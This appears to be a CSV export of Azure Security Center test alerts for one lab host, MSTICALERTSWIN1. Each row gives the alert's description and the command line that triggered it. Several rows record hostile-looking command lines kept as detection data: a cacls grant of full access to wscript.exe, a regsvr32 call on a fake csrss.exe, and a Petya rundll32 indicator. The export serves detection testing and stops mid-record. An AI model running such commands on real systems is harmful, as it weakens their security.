106,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,f9ddd8b3-5fa8-4f2f-b811-bdca90091195,2518547714853062206_f9ddd8b3-5fa8-4f2f-b811-bdca90091195,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x123c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x123c"",
""CommandLine"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.6937793Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.6937793Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.6937793Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
107,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,3252483f-2fdb-411a-93f5-e268d5e56abf,2518547714816637303_3252483f-2fdb-411a-93f5-e268d5e56abf,Detection,Microsoft,Detected suspicious file creation,Detected suspicious file creation,Detected suspicious file creation,Analysis of host data on MSTICALERTSWIN1 detected creation or execution of a process which has previously indicated post-compromise action taken on a victim host by activity group BARIUM. This activity group has been known to use this technique to download additional malware to a compromised host after an attachment in a phishing doc has been opened.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c \""powershell wscript.shell used to download a .gif\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1728"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: BARIUM\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-BARIUM.pdf?sv=2018-03-28&sr=b&sig=zdHvTlFfFEPYM9gxXSaUyQlSunoUx692qwD1bqdLrhs%3D&spr=https&st=2019-01-15T05:00:26Z&se=2019-04-15T05:15:26Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1728"",
""CommandLine"": ""cmd /c \""powershell wscript.shell used to download a .gif\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.3362696Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.3362696Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.3362696Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
108,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,fa4939d4-a20c-440a-839c-89c0c43e1ccc,2518547714812938298_fa4939d4-a20c-440a-839c-89c0c43e1ccc,Detection,Microsoft,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Analysis of host data on MSTICALERTSWIN1 detected indicators associated with Petya ransomware. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for more information. Review the commandline associated in this alert and escalate this alert to your security team.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo rundll32.exe perfc.dat"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xc18"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Petya\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Petya.pdf?sv=2018-03-28&sr=b&sig=pbso6xXF6nk7cwihw20Kh77IZl0%2BrxBRrf%2FxX8l7tdU%3D&spr=https&st=2019-01-14T19:39:23Z&se=2019-04-14T19:54:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xc18"",
""CommandLine"": ""cmd /c echo rundll32.exe perfc.dat"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.7061701Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.7061701Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.7061701Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
109,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,0e8db234-9727-41f3-a6e0-0773519603d2,2518547714833232927_0e8db234-9727-41f3-a6e0-0773519603d2,Detection,Microsoft,Detected suspicious commandline used to start all executables in a directory,Detected suspicious commandline used to start all executables in a directory,Detected suspicious commandline used to start all executables in a directory,Analysis of host data has detected a suspicious process running on MSTICALERTSWIN1. The commandline indicates an attempt to start all executables (*.exe) that may reside in a directory. This could be an indication of a compromised host.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\netsh.exe"",
""Suspicious Command Line"": "".\\netsh.exe \""in (*.exe) do start # artificial commandline solely for purposes of triggering test\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xbb4"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""netsh.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xbb4"",
""CommandLine"": "".\\netsh.exe \""in (*.exe) do start # artificial commandline solely for purposes of triggering test\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.6767072Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.6767072Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.6767072Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
110,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,c0822e2b-785b-41a8-8136-21b7430a0078,2518547714814450855_c0822e2b-785b-41a8-8136-21b7430a0078,Detection,Microsoft,Detected suspicious file cleanup commands,Detected suspicious file cleanup commands,Detected suspicious file cleanup commands,"Analysis of host data on MSTICALERTSWIN1 detected a combination of systeminfo commands that has previously been associated with one of activity group GOLD's methods of performing post-compromise self-cleanup activity. While 'systeminfo.exe' is a legitimate Windows tool, executing it twice in succession, followed by a delete command in the way that has occurred here is rare.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo \"" systeminfo && systeminfo && del \"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x17cc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: GOLD\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-GOLD.pdf?sv=2018-03-28&sr=b&sig=lfXooLPlTvNTSBe0WX9kaSKTtj1xl%2BbWiE6h7bkA1jI%3D&spr=https&st=2019-01-14T11:45:21Z&se=2019-04-14T12:00:21Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=9083b91f-eeee-467c-9770-82df2b1f0420\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17cc"",
""CommandLine"": ""cmd /c echo \"" systeminfo && systeminfo && del \"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.5549144Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.5549144Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.5549144Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
111,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,fcbb6bb7-4c7c-488e-903c-f625e98db7c4,2518547714825902697_fcbb6bb7-4c7c-488e-903c-f625e98db7c4,Detection,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often use SVCHOST to masquerade its malicious activity.,High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x15ec"",
""account logon id"": ""0xfaac27"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xbc8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=EEcvVV%2B6vHgaVPH1tjpS9gsjkHMUstMpQzuYn5tgK%2B8%3D&spr=https&st=2019-01-14T14:09:41Z&se=2019-04-14T14:24:41Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15ec"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.4097302Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.4097302Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.4097302Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
112,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,b2d9be9f-58e2-4174-8658-419670393253,2518547714824290520_b2d9be9f-58e2-4174-8658-419670393253,Detection,Microsoft,Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),This is a test alert generated by Azure Security Center. No further action is needed.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\asc_alerttest_662jfi039n.exe"",
""Suspicious Command Line"": ""asc_alerttest_662jfi039n.exe -foo"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1658"",
""Arguments Auditing Enabled"": ""true"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""asc_alerttest_662jfi039n.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1658"",
""CommandLine"": ""asc_alerttest_662jfi039n.exe -foo"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.5709479Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.5709479Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.5709479Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
113,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,1ba5718e-529b-441b-8036-ad06ee862e76,2518547714815952205_1ba5718e-529b-441b-8036-ad06ee862e76,Detection,Microsoft,Detected suspicious use of Cacls to lower the security state of the system.,Detected suspicious use of Cacls to lower the security state of the system.,Detected suspicious use of Cacls to lower the security state of the system.,"Attackers use myriad ways like brute force, spear phishing etc. to achieve initial compromise and get a foothold on the network . Once initial compromise is achieved they often take steps to lower the security settings of a system. Cacls—short for change access control list is Microsoft Windows native command line utility often used for modifying the security permission on folders and files. A lot of time the binary is used by the attackers to lower the security settings of a system. This is done by giving Everyone full access to some of the system binaries like ftp.exe, net.exe, wscript.exe etc. Analysis of host data on MSTICALERTSWIN1 detected suspicious use of Cacls to lower the security of a system.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cacls.exe"",
""Suspicious Command Line"": ""cacls.exe c:\\windows\\system32\\wscript.exe /e /t /g everyone:f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1798"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cacls.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1798"",
""CommandLine"": ""cacls.exe c:\\windows\\system32\\wscript.exe /e /t /g everyone:f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.4047794Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.4047794Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.4047794Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
114,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,a5df127a-f7e8-44ff-b404-6d5b37d06488,2518547714813299511_a5df127a-f7e8-44ff-b404-6d5b37d06488,Detection,Microsoft,Detected the disabling of critical services,Detected the disabling of critical services,Detected the disabling of critical services,"The analysis of host data on MSTICALERTSWIN1 detected execution of ""net.exe stop"" command being used to stop critical services like SharedAccess or Windows Security Center. The stopping of either of these service can be indication of a malicious behavior.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
